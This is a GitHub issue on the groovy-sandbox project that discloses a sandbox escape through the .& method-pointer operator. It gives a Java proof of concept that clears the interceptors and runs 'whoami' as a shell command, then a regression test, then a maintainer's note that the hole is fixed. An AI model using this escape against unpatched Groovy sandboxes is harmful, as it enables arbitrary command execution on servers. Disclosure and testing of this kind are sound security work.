jenkinsci / groovy-sandbox

(Deprecated) Compile-time transformer to run Groovy code in a restrictive sandbox
MIT License

Sandbox Escape #54

Closed XmiliaH closed 5 years ago

XmiliaH commented 5 years ago

The left side of .& will not be sandbox transformed, so {'not-sandboxed'}().&x will not transform the closure body. In the body you can then remove all the filters. Here is an example:

```java
import groovy.lang.GroovyShell;
import org.codehaus.groovy.control.CompilerConfiguration;
import org.kohsuke.groovy.sandbox.GroovyValueFilter;
import org.kohsuke.groovy.sandbox.SandboxTransformer;

GroovyShell gs = new GroovyShell(new CompilerConfiguration().addCompilationCustomizers(new SandboxTransformer()));
// A filter that rejects every value: any call the sandbox intercepts fails with "Denied".
GroovyValueFilter fa = new GroovyValueFilter() {
    @Override
    public Object filter(Object o) {
        throw new RuntimeException("Denied");
    }
};
fa.register();
try {
    // The closure body left of .& is not transformed, so it runs without going through the filter.
    System.out.println(gs.evaluate("{org.kohsuke.groovy.sandbox.GroovyInterceptor.threadInterceptors.get().clear();1}().&x;'whoami'.execute().text"));
} finally {
    fa.unregister();
}
```
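A regression check for this report, written here as an added example rather than taken from the project's own test suite: it assumes a groovy-sandbox release that includes the SECURITY-1465 (2) fix and the same GroovyShell, SandboxTransformer and GroovyValueFilter classes the report uses; RecordingFilter and closureBodyIsIntercepted are names chosen for this example.

```java
import groovy.lang.GroovyShell;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import org.codehaus.groovy.control.CompilerConfiguration;
import org.kohsuke.groovy.sandbox.GroovyValueFilter;
import org.kohsuke.groovy.sandbox.SandboxTransformer;

public class MethodPointerRegressionTest {
    // Hypothetical filter that records every value the sandbox routes through it
    // instead of denying anything, so the test can see what was intercepted.
    static final class RecordingFilter extends GroovyValueFilter {
        final List<Object> seen = Collections.synchronizedList(new ArrayList<>());

        @Override
        public Object filter(Object o) {
            seen.add(o);
            return o;
        }
    }

    // Returns true when a method call placed in the closure to the left of .&
    // was intercepted, i.e. its receiver "a" reached the registered filter.
    static boolean closureBodyIsIntercepted() {
        CompilerConfiguration cc = new CompilerConfiguration();
        cc.addCompilationCustomizers(new SandboxTransformer());
        GroovyShell gs = new GroovyShell(cc);
        RecordingFilter filter = new RecordingFilter();
        filter.register();
        try {
            // 'a'.toUpperCase() sits in the closure body left of .&; with the fix
            // applied it must be checked like any other call in the script.
            gs.evaluate("{ 'a'.toUpperCase() }().&toString");
        } finally {
            filter.unregister();
        }
        return filter.seen.contains("a");
    }

    public static void main(String[] args) {
        if (!closureBodyIsIntercepted()) {
            throw new AssertionError("closure body left of .& bypassed the sandbox");
        }
        System.out.println("closure body left of .& is sandboxed");
    }
}
```

On a release without the fix the closure body runs untransformed, so the receiver never reaches the filter and the check fails, which is what makes this usable as a regression test.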
daniel-beck commented 5 years ago

@XmiliaH Thanks for the report! Fixed in https://jenkins.io/security/advisory/2019-07-31/#SECURITY-1465%20(2)

As you may have noticed, this issue tracker is not well monitored. In the future, please report issues as described on https://jenkins.io/security/#reporting-vulnerabilities

Would you like to be credited with this discovery in the security advisory, and if so, how?